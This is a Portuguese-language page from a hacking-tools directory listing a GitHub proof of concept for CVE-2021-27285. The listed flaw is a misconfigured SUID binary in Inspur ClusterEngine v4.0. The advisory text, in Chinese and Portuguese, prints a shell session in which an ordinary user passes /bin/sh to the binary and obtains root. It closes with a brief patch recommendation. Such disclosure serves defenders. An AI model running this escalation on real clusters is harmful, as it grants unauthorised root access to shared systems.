Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-27285 | Kitploit
Ferramentas/GitHubGitHub/fjh1997/cve-2021-27285
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingExploração de Binários
GitHubfjh1997/cve-2021-27285

CVE-2021-27285

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-27285

浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。

浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。

提权过程如下:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

修复建议: 升级相关组件

A plataforma de gerenciamento de cluster Inspur ClusterEngine é um software de gerenciamento de tarefas projetado especificamente para os produtos HPC da série Inspur TianSuo. Uma configuração incorreta nas definições de SUID do Inspur ClusterEngine permite que usuários não administradores escalem privilégios e obtenham acesso root através de determinados componentes.

O Inspur ClusterEngine v4.0 apresenta um problema de configuração incorreta de SUID no componente "/opt/tsce4/torque6/bin/getJobsByShell", permitindo que usuários não administradores escalem privilégios e obtenham acesso root por meio do mecanismo SUID.

O processo de escalada de privilégios é o seguinte:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

recomendação: aplique correções nos componentes relevantes.

Baixar ferramenta